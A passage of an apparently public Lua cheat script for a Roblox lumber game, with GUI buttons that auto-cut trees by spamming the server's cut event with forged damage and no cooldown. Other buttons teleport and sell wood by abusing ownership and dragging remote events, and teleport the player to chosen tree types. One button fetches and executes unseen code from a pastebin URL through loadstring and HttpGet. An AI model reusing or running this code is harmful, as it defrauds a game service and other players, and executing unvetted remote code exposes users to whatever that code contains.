  1436. if TreeClass ~= "Volcano" then return 0.6 else return 6.35 end
  1437. elseif Axe.ToolTip == "End Times Axe" then
  1438. if TreeClass ~= "LoneCave" then return 1.58 else return 10000000 end
  1439. elseif Axe.ToolTip == "Candy Cane Axe" then return 0
  1440. elseif Axe.ToolTip == "Johiro" then return 1.8
  1441. elseif Axe.ToolTip == "Beesaxe" then return 1.4
  1442. elseif Axe.ToolTip == "CHICKEN AXE" then return 0.9
  1443. elseif Axe.ToolTip == "Amber Axe" then return 3.39
  1444. elseif Axe.ToolTip == "The Many Axe" then return 10.2
  1445. elseif Axe.ToolTip == "Gingerbread Axe" then
  1446. if TreeClass == "Walnut" then return 8.5
  1447. elseif TreeClass == "Koa" then return 11 else return 1.2 end
  1448. elseif Axe.ToolTip == "Bird Axe" then
  1449. if TreeClass == "Volcano" then return 2.5 elseif TreeClass == "CaveCrawler" then return 3.9 else return 1.65 end
  1450. end
  1451. end
  1452.  
  1453.  
  1454. function GCut(TreePart) --Cuts the tree when called with the tree you want to cut
  1455. if GetAxe() ~= false then --checks if you have a axe equiped
  1456. Damage = GetDamage(GetAxe(), TreePart.Parent.TreeClass.Value) --gets the Damage
  1457. Height = TreePart.CFrame:pointToObjectSpace(mouse.Hit.p).Y + TreePart.Size.Y/2 --Gets the Height
  1458. local CutArguments = {
  1459. sectionId = TreePart.ID.Value,
  1460. faceVector = Vector3.new(0,0,-1),
  1461. height = Height,
  1462. hitPoints = Damage,
  1463. cooldown = 0,
  1464. cuttingClass = "Axe",
  1465. tool = GetAxe()
  1466. }
  1467. for i=1, 50 do
  1468. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(TreePart.Parent.CutEvent, CutArguments)
  1469. end
  1470. end
  1471. end
  1472.  
  1473. function CutTree(Tree) --Cuts the tree when called with the tree you want to cut
  1474. if GetAxe() ~= false then --checks if you have a axe equiped
  1475. Damage = GetDamage(GetAxe(), Tree.TreeClass.Value) --gets the Damage
  1476. local CutArguments = {
  1477. sectionId = 1,
  1478. faceVector = Vector3.new(0,0,-1),
  1479. height = 0.5,
  1480. hitPoints = Damage,
  1481. cooldown = 0,
  1482. cuttingClass = "Axe",
  1483. tool = GetAxe()
  1484. }
  1485. for i=1, 50 do
  1486. game.ReplicatedStorage.Interaction.RemoteProxy:FireServer(Tree.CutEvent, CutArguments)
  1487. end
  1488. end
  1489. end
  1490.  
  1491. TreeList = {} --Creates a table of the trees
  1492. for a,b in pairs(workspace:GetChildren()) do
  1493. if b.name == "TreeRegion" then
  1494. b.ChildAdded:Connect(function(NewTree)--Creates functions that Adds new trees to the list
  1495. table.insert(TreeList, NewTree)
  1496. end)
  1497. for c,d in pairs(b:GetChildren()) do-- Adds the trees when first time starting the script
  1498. if d.Name == "Model" then
  1499. table.insert(TreeList, d)
  1500. end
  1501. end
  1502. end
  1503. end
  1504.  
  1505. spawn(function() --used spawn so it wont interrupt any of the other things
  1506. CutEnabled = false
  1507. while wait(.5) do --Main loop to do the stuff
  1508. if CutEnabled == true then
  1509. if GetAxe() ~= false then --Checks if you have a axe equiped
  1510. for a,b in pairs(TreeList) do
  1511. if not b:FindFirstChild("RootCut") and b:FindFirstChild("CutEvent") then --Checks if the tree is already cut
  1512. distance = (game.Players.LocalPlayer.Character.Head.Position - b.WoodSection.Position).magnitude --gets the distance between player and tree
  1513. if distance < 225 then --if distance lower than 225 then it will cut the tree
  1514. CutTree(b) --Calls the function with the tree to cut
  1515. end
  1516. else
  1517. table.remove(TreeList, a)--if tree already cut then it gets removed from the list
  1518. end
  1519. end
  1520. end
  1521. end
  1522. end
  1523. end)
  1524.  
  1525. mouse = game.Players.LocalPlayer:GetMouse() --Gets the Mouse
  1526. mouse.Button1Down:connect(function()
  1527. if GAxe == true and GetAxe() ~= false then
  1528. Target = mouse.Target
  1529. GCut(Target)
  1530. end
  1531. end)
  1532. --Credits to Johiro, if you decide to skid atleast give credits
  1533. end)
  1534. Goldaxe.MouseButton1Down:connect(function()
  1535. makesound("rbxassetid://156785206")
  1536. if GAxe == true then
  1537. GAxe = false
  1538. Goldaxe.Text = "Gold Axe Off"
  1539. Goldaxe.TextColor3 = Color3.new(255, 0, 0)
  1540. elseif GAxe == false then
  1541. GAxe = true
  1542. Goldaxe.Text = "Gold Axe On"
  1543. Goldaxe.TextColor3 = Color3.new(0, 1, 0)
  1544. --Credits to Johiro
  1545. end
  1546. end)
  1547.  
  1548.  
  1549. Harddrag.Name = "Harddrag"
  1550. Harddrag.Parent = WoodFrame
  1551. Harddrag.BackgroundColor3 = Color3.new(0, 0, 0)
  1552. Harddrag.BorderColor3 = Color3.new(0, 0, 0)
  1553. Harddrag.Position = UDim2.new(0, 3, 0, 49)
  1554. Harddrag.Size = UDim2.new(0, 165, 0, 20)
  1555. Harddrag.Font = Enum.Font.Fantasy
  1556. Harddrag.FontSize = Enum.FontSize.Size18
  1557. Harddrag.Text = "Hard drag"
  1558. Harddrag.TextColor3 = Color3.new(255, 0, 0)
  1559. Harddrag.TextSize = 15
  1560. Harddrag.MouseButton1Down:connect(function()
  1561. makesound("rbxassetid://156785206")
  1562. Harddrag.Text = "HARD DRAG ACTIVE"
  1563. Harddrag.TextColor3 = Color3.new(0, 1, 0)
  1564. loadstring(game:HttpGet('https://pastebin.com/raw/uMv85wZZ',true))()
  1565.  
  1566. end)
  1567.  
  1568.  
  1569. SellWood.Name = "SellWood"
  1570. SellWood.Parent = WoodFrame
  1571. SellWood.BackgroundColor3 = Color3.new(0, 0, 0)
  1572. SellWood.BorderColor3 = Color3.new(0, 0, 0)
  1573. SellWood.Position = UDim2.new(0, 3, 0, 72)
  1574. SellWood.Size = UDim2.new(0, 165, 0, 20)
  1575. SellWood.Font = Enum.Font.Fantasy
  1576. SellWood.FontSize = Enum.FontSize.Size18
  1577. SellWood.Text = "Sell Cut Wood"
  1578. SellWood.TextColor3 = Color3.new(255, 0, 0)
  1579. SellWood.TextSize = 15
  1580. SellWood.MouseButton1Down:connect(function()
  1581. makesound("rbxassetid://156785206")
  1582. for _, Log in pairs(workspace.LogModels:GetChildren()) do
  1583. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  1584. if Log.Owner.Value == game.Players.LocalPlayer then
  1585. for i,v in pairs(Log:GetChildren()) do
  1586. if v.Name=="WoodSection" then
  1587. spawn(function()
  1588. for i=1,10 do
  1589. wait()
  1590. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  1591. end
  1592. end)
  1593. end
  1594. end
  1595. spawn(function()
  1596. for i=1,20 do
  1597. wait()
  1598. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  1599. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  1600. end
  1601. end)
  1602. end
  1603. end
  1604. end
  1605. end)
  1606.  
  1607.  
  1608. SellPlanks.Name = "SellWood"
  1609. SellPlanks.Parent = WoodFrame
  1610. SellPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  1611. SellPlanks.BorderColor3 = Color3.new(0, 0, 0)
  1612. SellPlanks.Position = UDim2.new(0, 3, 0, 95)
  1613. SellPlanks.Size = UDim2.new(0, 165, 0, 20)
  1614. SellPlanks.Font = Enum.Font.Fantasy
  1615. SellPlanks.FontSize = Enum.FontSize.Size18
  1616. SellPlanks.Text = "Sell Planks"
  1617. SellPlanks.TextColor3 = Color3.new(255, 0, 0)
  1618. SellPlanks.TextSize = 15
  1619. SellPlanks.MouseButton1Click:Connect(function()
  1620. makesound("rbxassetid://156785206")
  1621. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1622. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  1623. if Plank.Owner.Value == game.Players.LocalPlayer then
  1624. for i,v in pairs(Plank:GetChildren()) do
  1625. if v.Name=="WoodSection" then
  1626. spawn(function()
  1627. for i=1,10 do
  1628. wait()
  1629. v.CFrame=CFrame.new(Vector3.new(315, -0.296, 85.791))*CFrame.Angles(math.rad(90),0,0)
  1630. end
  1631. end)
  1632. end
  1633. end
  1634. spawn(function()
  1635. for i=1,20 do
  1636. wait()
  1637. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank.WoodSection)
  1638. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Plank.WoodSection)
  1639. end
  1640. end)
  1641. end
  1642. end
  1643. end
  1644. end)
  1645.  
  1646.  
  1647. TPWood.Name = "TPWood"
  1648. TPWood.Parent = WoodFrame
  1649. TPWood.BackgroundColor3 = Color3.new(0, 0, 0)
  1650. TPWood.BorderColor3 = Color3.new(0, 0, 0)
  1651. TPWood.Position = UDim2.new(0, 3, 0, 118)
  1652. TPWood.Size = UDim2.new(0, 165, 0, 20)
  1653. TPWood.Font = Enum.Font.Fantasy
  1654. TPWood.FontSize = Enum.FontSize.Size18
  1655. TPWood.Text = "TP Wood to You"
  1656. TPWood.TextColor3 = Color3.new(255, 0, 0)
  1657. TPWood.TextSize = 15
  1658. TPWood.MouseButton1Click:Connect(function()
  1659. makesound("rbxassetid://156785206")
  1660. for _, Log in pairs(game.Workspace.LogModels:GetChildren()) do
  1661. if Log.Name:sub(1, 6) == "Loose_" and Log:findFirstChild("Owner") then
  1662. if Log.Owner.Value == game.Players.LocalPlayer then
  1663. Log:MoveTo(game.Players.LocalPlayer.Character.HumanoidRootPart.Position)
  1664. for i=1,20 do
  1665. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Log.WoodSection)
  1666. game.ReplicatedStorage.Interaction.ClientRequestOwnership:FireServer(Log.WoodSection)
  1667. end
  1668. end
  1669. end
  1670. end
  1671. end)
  1672.  
  1673. TpAllPlanks.Name = "TpAllPlanks"
  1674. TpAllPlanks.Parent = WoodFrame
  1675. TpAllPlanks.BackgroundColor3 = Color3.new(0, 0, 0)
  1676. TpAllPlanks.BorderColor3 = Color3.new(0, 0, 0)
  1677. TpAllPlanks.Position = UDim2.new(0, 3, 0, 141)
  1678. TpAllPlanks.Size = UDim2.new(0, 165, 0, 20)
  1679. TpAllPlanks.Font = Enum.Font.Fantasy
  1680. TpAllPlanks.FontSize = Enum.FontSize.Size18
  1681. TpAllPlanks.Text = "TP Planks to You"
  1682. TpAllPlanks.TextColor3 = Color3.new(255, 0, 0)
  1683. TpAllPlanks.TextSize = 15
  1684. TpAllPlanks.MouseButton1Click:Connect(function()
  1685. makesound("rbxassetid://156785206")
  1686. for _, Plank in pairs(game.Workspace.PlayerModels:GetChildren()) do
  1687. if Plank.Name=="Plank" and Plank:findFirstChild("Owner") then
  1688. if Plank.Owner.Value == game.Players.LocalPlayer then
  1689. sendNotice = game.ReplicatedStorage.Notices.SendUserNotice
  1690. sendNotice:Fire("Click where you want ALL the Planks to TP to")
  1691. local ButtonPress
  1692. ButtonPress = game.Players.LocalPlayer:GetMouse().Button1Down:Connect(function()
  1693. Square = game.Players.LocalPlayer:GetMouse().Target
  1694. if (Square.Name == "OriginSquare" or Square.Name == "Square") then
  1695. ButtonPress:Disconnect()
  1696. Plank:MoveTo(Square.Position)
  1697. for i=1,100 do
  1698. game.ReplicatedStorage.Interaction.ClientIsDragging:FireServer(Plank)
  1699. end
  1700. end
  1701. end)
  1702. end
  1703. end
  1704. end
  1705. end)
  1706.  
  1707. Type.Name = "Type"
  1708. Type.Parent = TptreeFrame
  1709. Type.BackgroundColor3 = Color3.new(0, 0, 0)
  1710. Type.BorderSizePixel = 1
  1711. Type.BorderColor3 = Color3.fromRGB(196, 40, 28)
  1712. Type.Position = UDim2.new(0, 0, 0, 0)
  1713. Type.Size = UDim2.new(0, 209, 0, 23)
  1714. Type.Font = Enum.Font.SourceSans
  1715. Type.Text = "Tree Type"
  1716. Type.TextColor3 = Color3.new(255, 0, 0)
  1717. Type.TextSize = 14
  1718.  
  1719. Tptree.Name = "Tptree"
  1720. Tptree.Parent = WoodFrame
  1721. Tptree.BackgroundColor3 = Color3.new(0, 0, 0)
  1722. Tptree.BorderColor3 = Color3.new(0, 0, 0)
  1723. Tptree.Position = UDim2.new(0, 3, 0, 164)
  1724. Tptree.Size = UDim2.new(0, 165, 0, 20)
  1725. Tptree.Font = Enum.Font.Fantasy
  1726. Tptree.FontSize = Enum.FontSize.Size18
  1727. Tptree.Text = "Port To Trees"
  1728. Tptree.TextColor3 = Color3.new(255, 0, 0)
  1729. Tptree.TextSize = 15
  1730. Tptree.MouseButton1Click:Connect(function()
  1731. makesound("rbxassetid://156785206")
  1732. end)
  1733.  
  1734. TptreeFrame.Name = "TptreeFrame"
  1735. TptreeFrame.Parent = MenuFrame
  1736. TptreeFrame.BorderSizePixel = 1
  1737. TptreeFrame.BackgroundTransparency = 1
  1738. TptreeFrame.BorderColor3 = Color3.new(0, 0, 0)
  1739. TptreeFrame.BackgroundColor3 = Color3.fromRGB(151, 0, 0)
  1740. TptreeFrame.Size = UDim2.new(0, 170, 0, 210)
  1741. TptreeFrame.Visible = false
  1742.  
  1743. BirchTree.Name = "BirchTree"
  1744. BirchTree.Parent = TptreeFrame
  1745. BirchTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1746. BirchTree.BackgroundTransparency = 0
  1747. BirchTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1748. BirchTree.Position = UDim2.new(0, 0, 0, 26)
  1749. BirchTree.Size = UDim2.new(0, 50, 0, 50)
  1750. BirchTree.Image = "rbxassetid://4053569393"
  1751.  
  1752. CavecrawlerTree.Name = "CavecrawlerTree"
  1753. CavecrawlerTree.Parent = TptreeFrame
  1754. CavecrawlerTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1755. CavecrawlerTree.BackgroundTransparency = 0
  1756. CavecrawlerTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1757. CavecrawlerTree.Position = UDim2.new(0, 53, 0, 26)
  1758. CavecrawlerTree.Size = UDim2.new(0, 50, 0, 50)
  1759. CavecrawlerTree.Image = "rbxassetid://4053567003"
  1760. CavecrawlerTree.MouseButton1Click:Connect(function()
  1761. makesound("rbxassetid://156785206")
  1762. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Cave"])
  1763. Type.Text = "Cavecrawler Tree"
  1764. end)
  1765.  
  1766. CherryTree.Name = "CherryTree"
  1767. CherryTree.Parent = TptreeFrame
  1768. CherryTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1769. CherryTree.BackgroundTransparency = 0
  1770. CherryTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1771. CherryTree.Position = UDim2.new(0, 106, 0, 26)
  1772. CherryTree.Size = UDim2.new(0, 50, 0, 50)
  1773. CherryTree.Image = "rbxassetid://4053570076"
  1774.  
  1775. ElmTree.Name = "ElmTree"
  1776. ElmTree.Parent = TptreeFrame
  1777. ElmTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1778. ElmTree.BackgroundTransparency = 0
  1779. ElmTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1780. ElmTree.Position = UDim2.new(0, 159, 0, 26)
  1781. ElmTree.Size = UDim2.new(0, 50, 0, 50)
  1782. ElmTree.Image = "rbxassetid://4053570665"
  1783.  
  1784. Frosttree.Name = "Frosttree"
  1785. Frosttree.Parent = TptreeFrame
  1786. Frosttree.BackgroundColor3 = Color3.new(1, 1, 1)
  1787. Frosttree.BackgroundTransparency = 0
  1788. Frosttree.BorderColor3 = Color3.new(0.6, 0, 0)
  1789. Frosttree.Position = UDim2.new(0, 0, 0, 79)
  1790. Frosttree.Size = UDim2.new(0, 50, 0, 50)
  1791. Frosttree.Image = "rbxassetid://4053571917"
  1792.  
  1793. GenericTree.Name = "GenericTree"
  1794. GenericTree.Parent = TptreeFrame
  1795. GenericTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1796. GenericTree.BackgroundTransparency = 0
  1797. GenericTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1798. GenericTree.Position = UDim2.new(0, 53, 0, 79)
  1799. GenericTree.Size = UDim2.new(0, 50, 0, 50)
  1800. GenericTree.Image = "rbxassetid://4053574105"
  1801.  
  1802. ZombieTree.Name = "ZombieTree"
  1803. ZombieTree.Parent = TptreeFrame
  1804. ZombieTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1805. ZombieTree.BackgroundTransparency = 0
  1806. ZombieTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1807. ZombieTree.Position = UDim2.new(0, 106, 0, 79)
  1808. ZombieTree.Size = UDim2.new(0, 50, 0, 50)
  1809. ZombieTree.Image = "rbxassetid://4053578037"
  1810.  
  1811. GoldTree.Name = "GoldTree"
  1812. GoldTree.Parent = TptreeFrame
  1813. GoldTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1814. GoldTree.BackgroundTransparency = 0
  1815. GoldTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1816. GoldTree.Position = UDim2.new(0, 159, 0, 79)
  1817. GoldTree.Size = UDim2.new(0, 50, 0, 50)
  1818. GoldTree.Image = "rbxassetid://4053572372"
  1819. GoldTree.MouseButton1Click:Connect(function()
  1820. makesound("rbxassetid://156785206")
  1821. game.Players.LocalPlayer.Character:MoveTo(WayPoints["Swamp"])
  1822. Type.Text = "Gold Tree"
  1823. end)
  1824.  
  1825.  
  1826. LavaTree.Name = "LavaTree"
  1827. LavaTree.Parent = TptreeFrame
  1828. LavaTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1829. LavaTree.BackgroundTransparency = 0
  1830. LavaTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1831. LavaTree.Position = UDim2.new(0, 0, 0, 132)
  1832. LavaTree.Size = UDim2.new(0, 50, 0, 50)
  1833. LavaTree.Image = "rbxassetid://4053573529"
  1834.  
  1835. PalmTree.Name = "PalmTree"
  1836. PalmTree.Parent = TptreeFrame
  1837. PalmTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1838. PalmTree.BackgroundTransparency = 0
  1839. PalmTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1840. PalmTree.Position = UDim2.new(0, 53, 0, 132)
  1841. PalmTree.Size = UDim2.new(0, 50, 0, 50)
  1842. PalmTree.Image = "rbxassetid://4053574535"
  1843.  
  1844. PhantomTree.Name = "PhantomTree"
  1845. PhantomTree.Parent = TptreeFrame
  1846. PhantomTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1847. PhantomTree.BackgroundTransparency = 0
  1848. PhantomTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1849. PhantomTree.Position = UDim2.new(0, 106, 0, 132)
  1850. PhantomTree.Size = UDim2.new(0, 50, 0, 50)
  1851. PhantomTree.Image = "rbxassetid://4053575065"
  1852.  
  1853. PineTree.Name = "PineTree"
  1854. PineTree.Parent = TptreeFrame
  1855. PineTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1856. PineTree.BackgroundTransparency = 0
  1857. PineTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1858. PineTree.Position = UDim2.new(0, 159, 0, 132)
  1859. PineTree.Size = UDim2.new(0, 50, 0, 50)
  1860. PineTree.Image = "rbxassetid://4053575551"
  1861.  
  1862. FirTree.Name = "FirTree"
  1863. FirTree.Parent = TptreeFrame
  1864. FirTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1865. FirTree.BackgroundTransparency = 0
  1866. FirTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1867. FirTree.Position = UDim2.new(0, 0, 0, 185)
  1868. FirTree.Size = UDim2.new(0, 50, 0, 50)
  1869. FirTree.Image = "rbxassetid://4053571273"
  1870.  
  1871. Snowglowtree.Name = "Snowglowtree"
  1872. Snowglowtree.Parent = TptreeFrame
  1873. Snowglowtree.BackgroundColor3 = Color3.new(1, 1, 1)
  1874. Snowglowtree.BackgroundTransparency = 0
  1875. Snowglowtree.BorderColor3 = Color3.new(0.6, 0, 0)
  1876. Snowglowtree.Position = UDim2.new(0, 53, 0, 185)
  1877. Snowglowtree.Size = UDim2.new(0, 50, 0, 50)
  1878. Snowglowtree.Image = "rbxassetid://4053576507"
  1879. Snowglowtree.MouseButton1Click:Connect(function()
  1880. makesound("rbxassetid://156785206")
  1881. local uTorso = workspace:WaitForChild(game.Players.LocalPlayer.Name).HumanoidRootPart
  1882. uTorso.CFrame = WayPoints["SnowGlow Tree"]
  1883. Type.Text = "Snowglow Tree"
  1884. end)
  1885.  
  1886. Spooktree.Name = "Spooktree"
  1887. Spooktree.Parent = TptreeFrame
  1888. Spooktree.BackgroundColor3 = Color3.new(1, 1, 1)
  1889. Spooktree.BackgroundTransparency = 0
  1890. Spooktree.BorderColor3 = Color3.new(0.6, 0, 0)
  1891. Spooktree.Position = UDim2.new(0, 106, 0, 185)
  1892. Spooktree.Size = UDim2.new(0, 50, 0, 50)
  1893. Spooktree.Image = "rbxassetid://4053576987"
  1894.  
  1895.  
  1896. WalnutTree.Name = "WalnutTree"
  1897. WalnutTree.Parent = TptreeFrame
  1898. WalnutTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1899. WalnutTree.BackgroundTransparency = 0
  1900. WalnutTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1901. WalnutTree.Position = UDim2.new(0, 159, 0, 185)
  1902. WalnutTree.Size = UDim2.new(0, 50, 0, 50)
  1903. WalnutTree.Image = "rbxassetid://4053577500"
  1904.  
  1905. KoaTree.Name = "KoaTree"
  1906. KoaTree.Parent = TptreeFrame
  1907. KoaTree.BackgroundColor3 = Color3.new(1, 1, 1)
  1908. KoaTree.BackgroundTransparency = 0
  1909. KoaTree.BorderColor3 = Color3.new(0.6, 0, 0)
  1910. KoaTree.Position = UDim2.new(0, 53, 0, 238)
  1911. KoaTree.Size = UDim2.new(0, 50, 0, 50)
  1912. KoaTree.Image = "rbxassetid://4053573002"
  1913.  
  1914. SinisterGlow.Name = "SinisterGlow"
  1915. SinisterGlow.Parent = TptreeFrame
  1916. SinisterGlow.BackgroundColor3 = Color3.new(1, 1, 1)
  1917. SinisterGlow.BackgroundTransparency = 0
  1918. SinisterGlow.BorderColor3 = Color3.new(0.6, 0, 0)
  1919. SinisterGlow.Position = UDim2.new(0, 106, 0, 238)
  1920. SinisterGlow.Size = UDim2.new(0, 50, 0, 50)
  1921. SinisterGlow.Image = "rbxassetid://4053576051"
  1922.  
  1923. BirchTree.MouseButton1Click:Connect(function()
  1924. makesound("rbxassetid://156785206")
  1925. for i, v in pairs(game.Workspace:GetChildren()) do
  1926. if v.Name == "TreeRegion" then
  1927. for j, k in ipairs(v:GetChildren()) do
  1928. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Birch" then
  1929. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1930. break
  1931. end
  1932. end
  1933. end
  1934. end
  1935. Type.Text = "Birch Tree"
  1936. end)
  1937.  
  1938.  
  1939. CherryTree.MouseButton1Click:Connect(function()
  1940. makesound("rbxassetid://156785206")
  1941. for i, v in pairs(game.Workspace:GetChildren()) do
  1942. if v.Name == "TreeRegion" then
  1943. for j, k in ipairs(v:GetChildren()) do
  1944. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Cherry" then
  1945. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1946. break
  1947. end
  1948. end
  1949. end
  1950. end
  1951. Type.Text = "Cherry Tree"
  1952. end)
  1953.  
  1954. ElmTree.MouseButton1Click:Connect(function()
  1955. makesound("rbxassetid://156785206")
  1956. for i, v in pairs(game.Workspace:GetChildren()) do
  1957. if v.Name == "TreeRegion" then
  1958. for j, k in ipairs(v:GetChildren()) do
  1959. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Oak" then
  1960. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1961. break
  1962. end
  1963. end
  1964. end
  1965. end
  1966. Type.Text = "ElmTree"
  1967. end)
  1968.  
  1969. FirTree.MouseButton1Click:Connect(function()
  1970. makesound("rbxassetid://156785206")
  1971. for i, v in pairs(game.Workspace:GetChildren()) do
  1972. if v.Name == "TreeRegion" then
  1973. for j, k in ipairs(v:GetChildren()) do
  1974. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Fir" then
  1975. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1976. break
  1977. end
  1978. end
  1979. end
  1980. end
  1981. Type.Text = "Fir Tree"
  1982. end)
  1983.  
  1984. Frosttree.MouseButton1Click:Connect(function()
  1985. makesound("rbxassetid://156785206")
  1986. for i, v in pairs(game.Workspace:GetChildren()) do
  1987. if v.Name == "TreeRegion" then
  1988. for j, k in ipairs(v:GetChildren()) do
  1989. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Frost" then
  1990. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  1991. break
  1992. end
  1993. end
  1994. end
  1995. end
  1996. Type.Text = "Frost Tree"
  1997. end)
  1998.  
  1999. GenericTree.MouseButton1Click:Connect(function()
  2000. makesound("rbxassetid://156785206")
  2001. for i, v in pairs(game.Workspace:GetChildren()) do
  2002. if v.Name == "TreeRegion" then
  2003. for j, k in ipairs(v:GetChildren()) do
  2004. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Generic" then
  2005. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2006. break
  2007. end
  2008. end
  2009. end
  2010. end
  2011. Type.Text = "Generic Tree"
  2012. end)
  2013.  
  2014.  
  2015. KoaTree.MouseButton1Click:Connect(function()
  2016. makesound("rbxassetid://156785206")
  2017. for i, v in pairs(game.Workspace:GetChildren()) do
  2018. if v.Name == "TreeRegion" then
  2019. for j, k in ipairs(v:GetChildren()) do
  2020. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Koa" then
  2021. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2022. break
  2023. end
  2024. end
  2025. end
  2026. end
  2027. Type.Text = "Koa Tree"
  2028. end)
  2029.  
  2030. LavaTree.MouseButton1Click:Connect(function()
  2031. makesound("rbxassetid://156785206")
  2032. for i, v in pairs(game.Workspace:GetChildren()) do
  2033. if v.Name == "TreeRegion" then
  2034. for j, k in ipairs(v:GetChildren()) do
  2035. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Volcano" then
  2036. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2037. break
  2038. end
  2039. end
  2040. end
  2041. end
  2042. Type.Text = "Lava Tree"
  2043. end)
  2044.  
  2045. PalmTree.MouseButton1Click:Connect(function()
  2046. makesound("rbxassetid://156785206")
  2047. for i, v in pairs(game.Workspace:GetChildren()) do
  2048. if v.Name == "TreeRegion" then
  2049. for j, k in ipairs(v:GetChildren()) do
  2050. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Palm" then
  2051. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2052. break
  2053. end
  2054. end
  2055. end
  2056. end
  2057. Type.Text = "Palm Tree"
  2058. end)
  2059.  
  2060. PhantomTree.MouseButton1Click:Connect(function()
  2061. makesound("rbxassetid://156785206")
  2062. for i, v in pairs(game.Workspace:GetChildren()) do
  2063. if v.Name == "TreeRegion" then
  2064. for j, k in ipairs(v:GetChildren()) do
  2065. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "LoneCave" then
  2066. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2067. break
  2068. end
  2069. end
  2070. end
  2071. end
  2072. Type.Text = "Phantom Tree"
  2073. end)
  2074.  
  2075. PineTree.MouseButton1Click:Connect(function()
  2076. makesound("rbxassetid://156785206")
  2077. for i, v in pairs(game.Workspace:GetChildren()) do
  2078. if v.Name == "TreeRegion" then
  2079. for j, k in ipairs(v:GetChildren()) do
  2080. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Pine" then
  2081. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2082. break
  2083. end
  2084. end
  2085. end
  2086. end
  2087. Type.Text = "Pine Tree"
  2088. end)
  2089.  
  2090. SinisterGlow.MouseButton1Click:Connect(function()
  2091. makesound("rbxassetid://156785206")
  2092. for i, v in pairs(game.Workspace:GetChildren()) do
  2093. if v.Name == "TreeRegion" then
  2094. for j, k in ipairs(v:GetChildren()) do
  2095. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "SpookyNeon" then
  2096. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2097. break
  2098. end
  2099. end
  2100. end
  2101. end
  2102. Type.Text = "Sinister Tree"
  2103. end)
  2104.  
  2105.  
  2106. Spooktree.MouseButton1Click:Connect(function()
  2107. makesound("rbxassetid://156785206")
  2108. for i, v in pairs(game.Workspace:GetChildren()) do
  2109. if v.Name == "TreeRegion" then
  2110. for j, k in ipairs(v:GetChildren()) do
  2111. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Spooky" then
  2112. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2113. break
  2114. end
  2115. end
  2116. end
  2117. end
  2118. Type.Text = "Spook Tree"
  2119. end)
  2120.  
  2121. WalnutTree.MouseButton1Click:Connect(function()
  2122. makesound("rbxassetid://156785206")
  2123. for i, v in pairs(game.Workspace:GetChildren()) do
  2124. if v.Name == "TreeRegion" then
  2125. for j, k in ipairs(v:GetChildren()) do
  2126. if k:FindFirstChild("TreeClass") and k.TreeClass.Value == "Walnut" then
  2127. game.Players.LocalPlayer.Character:MoveTo(k.WoodSection.Position)
  2128. break
  2129. end
  2130. end
  2131. end
  2132. end
  2133. Type.Text = "Walnut Tree"
  2134. end)
  2135.  
  2136. ZombieTree.MouseButton1Click:Connect(function()
  2137. makesound("rbxassetid://156785206")
  2138. for i, v in pairs(game.Workspace:GetChildren()) do
  2139. if v.Name == "TreeRegion" then
